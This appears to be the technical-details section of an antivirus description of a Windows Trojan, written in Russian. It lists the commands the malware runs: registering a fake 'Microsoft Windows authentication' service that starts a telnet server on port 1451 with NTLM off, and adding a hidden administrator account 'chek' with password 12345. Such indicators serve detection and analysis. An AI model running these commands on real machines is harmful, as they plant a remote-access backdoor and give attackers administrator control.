Техническая информация
- [<HKLM>\SYSTEM\ControlSet001\Services\Microsoft Network] 'Start' = '00000002'
- <SYSTEM32>\tlntsevr.exe
- <SYSTEM32>\sc.exe description "Microsoft Network" "Удостоверяет, что ваш компьютер использует лицензионное программное обеспечение."
- <SYSTEM32>\sc.exe create "Microsoft Network" binpath= <SYSTEM32>\tlntsevr.exe type= own start= auto displayname= "Проверка подлинности Microsoft Windows" error= ignore depend= RPCSS/TCPIP/NTLMSSP
- <SYSTEM32>\tlntadmn.exe config port=1451 sec=-NTLM
- <SYSTEM32>\regsvr32.exe /s <SYSTEM32>\tlntsvrp.dll
- <SYSTEM32>\net1.exe start "Проверка подлинности Microsoft Windows"
- <SYSTEM32>\net1.exe user chek 12345 /add
- <SYSTEM32>\chcp.com 1251
- <SYSTEM32>\net1.exe localgroup "Администраторы" chek /add
- %WINDIR%\regedit.exe /s user.reg
- <SYSTEM32>\net1.exe localgroup "Пользователи" chek /del
- <Текущая директория>\user.reg
- <SYSTEM32>\tlntsevr.exe
- %TEMP%\a43445.bat
- %TEMP%\a43445.bat
- %TEMP%\a43445.bat
- <Текущая директория>\user.reg
- ClassName: 'RegEdit_RegEdit' WindowName: ''